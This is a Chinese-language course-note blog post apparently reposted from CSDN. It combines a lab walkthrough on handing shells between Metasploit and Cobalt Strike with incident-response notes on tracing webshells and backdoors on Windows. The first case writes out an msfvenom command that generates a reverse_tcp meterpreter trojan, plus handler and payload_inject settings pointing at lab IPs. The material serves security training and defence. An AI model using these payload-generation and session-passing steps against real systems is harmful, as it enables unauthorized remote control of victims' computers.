p72 内网安全

2023-05-18 18:10| 来源: 网络整理| 查看: 265

数据来源

演示案例 MSF&CobaltStrike 联动 ShellWEB 攻击应急响应朔源-后门,日志WIN 系统攻击应急响应朔源-后门,日志,流量临时给大家看看学的好的怎么干对应 CTF 比赛案例1 - MSF&CobaltStrike联动Shell

CS下载与安装：cobaltstrike的安装与基础使用_cobalt strike windows运行_正经人_____的博客-CSDN博客

环境准备：一台kali，一台靶机（我这里为了简单一点，就用两台虚拟机，你可以在远程服务器部署CS，然后kali中运行MSF(kail自带)，最后在找一台靶机）

CS->MSF 1）先配置cs

先使用CS创建一个监听器

随便使用个监听器生成木马并上线就好（使用那个监听器生成木马上线都行，只要能上线）

2）使用msf创建监听

我这里是在kali中重新打开一个终端（msf是kali自带的）

msfconsole # 启动 metasploita命令行 use exploit/multi/handler # 使用模块 set payload windows/meterpreter/reverse_http # 这里使用的攻击载荷要与CS监听器的相同（名字并不是完全相同，同样是windows的模块然后最后的协议一样就好reverse_http） set lhost 192.168.22.145 # 设置监听的ip，要与cs的监听器相同 set lport 6677 # 端口也要与cs监听器端口保持一致 run # 启动模块

然后回到cs将后门的shell转发一个给msf

大概等一分钟左右就上线了

MSF->CS 1）CS创建监听器

2）使用msf拿到受害者的shell会话

要使用msf创建木马然后开启监听，再把木马复制到受害者主机中上线

生成木马

# 攻击载荷监听ip 监听端口 demo999.exe（生成的文件名） msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.3 lport=9988 -f exe -o demo999.exe

开启监听

msfconsole # 启动 metasploita命令行 use exploit/multi/handler # 使用模块 set payload windows/x64/meterpreter/reverse_tcp # 这个攻击载荷就是上面我们使用的攻击载荷 set LHOST 192.168.1.3 # LHOSTS为 listen host （侦听主机）代表你是谁，既kali的IP地址 set lport 9988 # 就是要在kali上要开启的端口，注意这里的端口要和前面生成木马文件的端口一样 run # 简单理解就是把鱼钩放到河里

到靶机中执行木马

监听msf的监听情况，成功拿到shell

3）msf获取到shell会话后的操作

先background退出会话，查看当前的sessions会话

进入模块exploit/windows/local/payload_inject，查看需要设置的参数

use exploit/windows/local/payload_inject # 进入模块 show options # 查看设置

设置payload，这里的payload需要与cs处监听器设置的协议保持一致

set payload windows/meterpreter/reverse_http

show options查看并设置参数，设置端口，与cs处保持一致，设置lhost为cs服务器的ip地址，载入对应的session会话

set lport 17822 # 端口需要与cs监听器端口保持一致`` set lhost 192.168.1.3 # IP设置为msf本地IP，与CS设置保持一致`` set session 1 # 最开启查看的session的id就是1

run # 最后运行攻击模块

案例2 - WEB攻击应急响应溯源-后门，日志

故事回顾：某客户反应自己的网站首页出现被篡改，请求支援

分析：涉及的攻击面涉及的操作权限涉及的攻击意图涉及的攻击方式

思路1：利用日志定位修改时间基数，将前时间进行攻击分析，后时间进行操作分析思路2：利用后门WebShell查杀脚本或工具找到对应后门文件，定位第一次时间分析 netstat -ano

站在攻击者的角度，去分析。攻击者当前拿到哪些权限，网站还是系统权限。装没装杀软，用渗透者的思路去想问题。注重信息搜集，从攻击面入手查看应急响应。

1）执行netstat -ano命令，通过开放的端口找到对应的PID。 netstat -ano # 查看本机开放的端口

2）执行tasklist -svc命令，通过PID找到对应的进程名称 tasklist /svc

3）在任务管理器，找到对应的进程

之后就可以停止服务并删除文件

4）也可以进行日志分析

p74 应急响应-win&linux 分析后门&勒索病毒&攻击_cs生成linux木马_正经人_____的博客-CSDN博客

p73 应急响应-WEB 分析 php&javaweb&自动化工具_正经人_____的博客-CSDN博客

案例3 - Win系统攻击应急响应溯源-后门，日志，流量

分析：涉及的攻击面涉及的操作权限涉及的攻击意图涉及的攻击方式

故事回顾：某客户反应服务器异常出现卡顿等情况

思路：利用监控工具分析可疑进程，利用杀毒软件分析可疑文件，利用接口工具抓流量

获取进程监控：PCHunter64

一般的木马是没有产商信息

但是有些伪装的很好所以这个不能作为我们判断的唯一标准，可以再借助一些其他信息辅助我们进行判断

远程ip

可以在目标主机的命令行查看端口信息

# 查看本机端口开放信息 netstat -an

计划任务

系统用户名

还可以借助一些杀毒软件：腾讯、360、火绒这些

获取执行列表：UserAssistView

我感觉这个软件没有 PCHunter64 好用

涉及资源 https://www.onlinedown.net/soft/628964.htmhttps://www.cnblogs.com/xiaozi/p/12679777.htmlhttp://www.pc6.com/softview/SoftView_195167.htmlhttps://github.com/EricZimmerman/AppCompatCacheParser/releases/

【本文地址】

公司简介

联系我们

今日新闻

推荐新闻

专题文章